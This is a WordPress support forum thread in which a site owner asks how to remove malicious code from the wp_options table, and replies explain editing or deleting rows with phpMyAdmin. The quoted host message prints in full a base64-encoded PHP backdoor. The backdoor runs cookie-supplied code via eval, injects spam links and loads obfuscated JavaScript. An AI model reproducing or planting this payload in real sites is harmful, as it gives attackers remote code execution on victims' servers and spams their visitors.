Support » Fixing WordPress » How to Eliminate Malicious Code from Database

  • Resolved dworsky

    (@dworsky)


    Through some security flaw, malicious code was entered into my database. Apparently it is obfuscated php code that adds drug-related text in the BEGIN TITLE HEAD BAR section of my index template.

    I know nothing about editing a SQL database and do not know how to use MYPHPADMIN . Could someone kindly walk me through, step by step, how to get rid of this offending code without screwing up everything?

    Here is what my hosting company said:

    The code isn’t part of your scripts, its contained in your wordpress database under the wp_options table, the row with option_id “78”, option_name “blog_headers” contains the bad code showing on your site. Your theme displays this code with this:

    <?php $wp_headers() ?>

    You’ll notice a long string of numbers/letters in the above mentioned database field, specifically:

    Pz48P3BocAoJaWYoaXNzZXQoJF9DT09LSUVbJ2F1dGgnXSkgJiYgJF9DT09LSUVbJ2F1dGgnXSA9PSAnNTM1ZWE5ZjAzOGE4M2IyZGU3YzliNmI3MzlmOWJiMjAnKSB7CgkJaWYgKGlzc2V0KCRfQ09PS0lFWydzaG93X3Rlc3QnXSkpIHsKCQkJZWNobygiPFRFU1RQQVNTPiIpOwoJCX0KCQkkaSA9IDA7ICRsaW4gPScnOwoJCXdoaWxlIChpc3NldCgkX0NPT0tJRVsnbGFzdGluJy4kaV0pKSB7CgkJCSRsaW4uPSAkX0NPT0tJRVsnbGFzdGluJy4kaV07CgkJCSRpKys7CgkJfQoJCWlmKHN0cmxlbigkbGluKT4wKSB7CgkJCWVjaG8oIjxsYXN0aW4+Ii5tZDUoJGxpbikuIjwvbGFzdGluPjxleC1kYXRhPiIpOwoJCQkkbGluID0gcHJlZ19yZXBsYWNlKCcvXy8nLCAnKycsICRsaW4pOwoJCQlldmFsKGJhc2U2NF9kZWNvZGUoJGxpbikpOwoJCQllY2hvKCI8L2V4LWRhdGE+Iik7CgkJCSRjb2RlID0gZ2V0X29wdGlvbignYmxvZ19oZWFkZXJzJyk7CgkJCWlmIChwcmVnX21hdGNoKCcvOTU5ODhkZD1cJyguKj8pXCcvcycsICRjb2RlLCAkcmVncykpIHsKCQkJCWVjaG8oIjx2ZXI+Ii5tZDUoJHJlZ3NbMV0pLiI8L3Zlcj4iKTsKCQkJfQoJCX0KCQlleGl0KCk7Cgl9CgkkdGV4dCA9IGdldF9vcHRpb24oJ3JlY2VudGx5X2FkZGVkJyk7CgkkdWEgPSAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107CglpZiAoaXNzZXQoJHRleHQpICYmIHN0cmxlbigkdGV4dCk+MCAmJiAocHJlZ19tYXRjaCgnLyhib3R8c3BpZGVyfHNsdXJwfGdvb2dsZXxleHBsb3JlcnxmaXJlZm94fG9wZXJhKS9pJywgJHVhKSkpIHsKCQkJCSRycSA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOwoJCQkJJHJzcyA9ICJyc3NfIi5tZDUoJHJxKTsKCQkJCSRzZWVkID0gdW5zZXJpYWxpemUoYmFzZTY0X2RlY29kZShnZXRfb3B0aW9uKCRyc3MpKSk7CgkJCQlpZiAoISRzZWVkKSB7CgkJCQkJZ2xvYmFsICR3cGRiOwoJCQkJCSR3cGRiLT5xdWVyeSgiSU5TRVJUIElOVE8gJHdwZGItPm9wdGlvbnMgKG9wdGlvbl9uYW1lLCBvcHRpb25fdmFsdWUsIG9wdGlvbl9kZXNjcmlwdGlvbiwgYXV0b2xvYWQpIFZBTFVFUyAoJyRyc3MnLCAnJywgJycsICd5ZXMnKSIpOwoJCQkJCSRzZWVkID0gJHdwZGItPmdldF92YXIoIlNFTEVDVCBMQVNUX0lOU0VSVF9JRCgpIik7CgkJCQkJdXBkYXRlX29wdGlvbigkcnNzLGJhc2U2NF9lbmNvZGUoc2VyaWFsaXplKGFycmF5KCRzZWVkLCRycSkpKSk7CgkJCQl9IGVsc2UgewoJCQkJCSRzZWVkID0gJHNlZWRbMF07CgkJCQl9CgkJCQkkdGV4dCA9IGJhc2U2NF9kZWNvZGUoJHRleHQpOwoJCQkJJGEgPSBzcGxpdCgiXG4iLCAkdGV4dCk7CgkJCQkkbHMgPSBzaXplb2YoJGEpOwoJCQkJJHdjID0gY2VpbCgkbHMvMzApOwoJCQkJd2hpbGUoJHNlZWQ+JHdjKSB7CgkJCQkJJHNlZWQtPSR3YzsKCQkJCX0KCQkJCWVjaG8gJzxkaXYgaWQ9Imdvcm8iPic7CgkJCQllY2hvIGpvaW4oIiZuYnNwOyIsYXJyYXlfc2xpY2UoJGEsJHNlZWQqMzAtMzAsMzApKTsKCQkJCWVjaG8gJzwvZGl2PjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4nOwoJCQkJZWNobyAiZnVuY3Rpb24gZ2V0bWUoc3RyKXsgdmFyIGlkeCA9IHN0ci5pbmRleE9mKCc/Jyk7IGlmIChpZHggPT0gLTEpIHJldHVybiBzdHI7IHZhciBsZW4gPSBzdHIubGVuZ3RoOyB2YXIgbmV3X3N0ciA9ICcnOyB2YXIgaSA9IDE7IGZvciAoKytpZHg7IGlkeCA8IGxlbjsgaWR4ICs9IDIsaSsrKXsgdmFyIGNoID0gcGFyc2VJbnQoc3RyLnN1YnN0cihpZHgsIDIpLCAxNik7IG5ld19zdHIgKz0gU3RyaW5nLmZyb21DaGFyQ29kZSgoY2ggKyBpKSAlIDI1Nik7IH0gZXZhbChuZXdfc3RyKTsgfSI7CgkJCQllY2hvICJnZXRtZSgnaHR0cDovL3BhZ2VhZDIuZ29vZ2xlc3luZGljYXRpb24uY29tL3BhZ2VhZC9zaG93X2Fkcy5qcz82MzZENjA3MTY4NUY2NzZDMjU1RDVBNjgzODVFNTY1RDU0NUM2MTJFNjQzMzREMTAwRTRENTQ1NjUyMDkwQTBFNTI1MjU2NDg0MDA4M0Q0MTRBNDY0MTM1NEMwRkY4M0UzRTNDMzJGMzA2Jyk7IDwvc2NyaXB0PiI7Cgl9Cgo/Pg==

    The above is base64 encoded, if you use a decoder you can see the bad code your site is executing at this point. For simplicities sake I have included a webpage based encoder/decoder so you can just copy & paste the above string and click decode it at the below site:

    http://makcoder.sourceforge.net/demo/base64.php

    You’ll then see the code your site is executing, which is actually PHP code.
    =========

    Thanks in advance.

Viewing 2 replies - 1 through 2 (of 2 total)
  • Knowing how to use phpMyAdmin is a valuable skill. Take a look at this article, phpMyAdmin Tutorial for an introduction to the subject.

    Then read Podz’ article on changing the site-url.

    At that point you have an idea on how you edit a record (row) in wp_options. Now just find the rows you need to delete in wp_options and instead of clicking on the Edit icon, click on the Delete icon (big red X).

    Also, remember you should always have a database backup before attempting direct changes to your database so please review and follow the instructions in Backing_Up_Your_Database.

    Michael,

    Thanks for you help.

    I actually figured out how to edit the offending code out and did not delete the entry because it was needed for the real header.

    Edgar

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘How to Eliminate Malicious Code from Database’ is closed to new replies.